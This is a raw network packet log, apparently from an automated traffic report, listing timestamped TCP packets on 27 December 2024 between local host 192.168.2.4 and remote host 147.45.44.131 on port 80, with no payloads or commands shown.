                                                                                              Dec 27, 2024 22:33:10.547586918 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.547750950 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.547813892 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.548162937 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.548281908 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.548304081 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.550122976 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.552006960 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.552110910 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.552129030 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.552943945 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.553045988 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.553093910 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.555855036 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.555912018 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.555921078 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.558343887 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.558484077 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.558540106 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.559607029 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.559664965 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.559706926 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.563456059 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.563558102 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.563576937 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.563616037 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.563745022 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.563790083 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.567177057 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.567276001 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.567302942 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.569031954 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.569160938 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.569209099 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.570986032 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.571039915 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.571089983 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.574321032 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.574435949 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.574521065 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.574801922 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.574850082 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.574887991 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.578629971 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.578744888 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.578869104 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.579674006 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.579750061 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.579806089 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.582429886 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.582489967 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.582531929 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.585994005 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.586047888 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.586066008 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.586127996 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.586179018 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.586194992 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.586210966 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.586226940 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.586229086 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.586255074 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.586314917 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.586342096 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.586359024 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.586361885 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.586405039 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.586498976 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.586514950 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.766473055 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.766510963 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.767376900 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.767426014 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.767482042 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.770159006 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.770206928 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.770231009 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.770246983 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.770293951 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.770308018 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.773041010 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.773114920 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.773147106 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.773849964 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.773900032 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.773966074 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.775891066 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.775942087 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.775979996 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.777587891 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.777637959 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.777707100 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.778640032 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.778703928 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.778727055 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.781289101 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.781357050 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.781395912 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.781459093 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.781474113 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.781506062 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.784270048 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.784347057 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.784373999 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.784971952 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.785026073 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.785096884 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.787070990 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.787132978 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.787172079 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.787930012 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.788022995 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.788077116 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.788707972 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.788770914 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.788809061 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.789881945 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.789956093 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.789979935 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.792140961 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.792462111 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.792507887 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.792519093 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.792666912 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.792712927 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.792807102 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.793684006 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.793736935 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.793818951 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.795511961 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.795528889 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.795589924 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.798384905 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.798449039 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.798491955 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.801170111 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.801235914 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.801287889 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.802032948 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.802084923 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.802175045 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.803985119 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.804037094 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.804042101 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.806763887 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.806840897 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.806863070 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.809643984 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.809731960 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.809755087 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.810439110 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.810488939 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.810585976 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.812335968 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.812391996 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.818824053 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.818886042 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.818938017 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.827223063 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.827296019 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.827346087 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.835644007 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.835760117 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.835769892 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.842597961 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.844043016 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.844115973 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.844139099 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.846015930 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.846100092 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.846129894 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.847436905 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.847484112 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.847489119 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.850115061 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.850156069 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.850156069 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.852440119 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.852489948 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.852545023 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.852781057 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.852824926 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.852880001 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.855494976 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.855537891 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.855588913 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.858200073 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.858247995 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.858252048 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.860831022 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.860883951 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.860887051 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.860898972 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.860940933 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.863369942 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.863430023 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.863518953 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.865917921 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.865971088 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.866004944 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.868525982 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.868578911 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.868592978 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.870912075 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.870964050 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.871009111 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.873316050 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.873375893 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.873430014 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.875865936 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.875931978 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.875994921 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.878144026 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.878232956 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.878246069 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.880541086 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.880625963 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.880635977 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.882833958 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.882886887 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.882947922 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.885268927 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.885325909 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.885327101 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.887581110 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.887631893 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.887754917 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.889919043 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.889967918 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.890029907 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.892333031 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.892389059 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.892479897 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.893871069 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.894006014 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.894053936 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.894747972 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.894789934 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.894860029 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.895095110 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.895652056 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.895701885 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.965388060 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.965607882 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.965734959 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.965796947 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.966373920 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.966427088 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.966522932 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.967679977 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.967699051 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.967711926 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.967751980 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.967757940 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.967807055 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.968992949 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.969047070 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.969115973 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.969765902 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.969863892 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.969917059 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.971648932 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.971699953 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.971786022 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.971887112 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.971904039 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.971951008 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.973953962 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.974077940 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.974149942 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.974298954 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.974347115 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.974387884 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.976022959 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.976123095 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.976197004 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.976958036 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.977016926 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.977056980 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.978157997 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.978250027 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.978301048 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.979645014 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.979698896 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.979739904 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.980216026 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.980295897 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.980345011 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.982295990 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.982348919 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.982352972 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.982364893 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.982481956 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.982531071 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.984378099 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.984498978 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.984570026 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.984945059 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.984996080 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.985037088 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.986524105 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.986632109 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.986681938 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.987586975 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.987637043 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.987776041 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.988562107 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.988668919 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.988720894 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.990266085 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.990328074 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.990356922 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.990636110 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.990766048 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.990816116 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.992719889 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.992765903 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.992814064 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.992950916 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.992997885 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.993114948 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.994822025 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.994924068 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.994976997 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.995575905 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.995619059 CET4974380192.168.2.4147.45.44.131
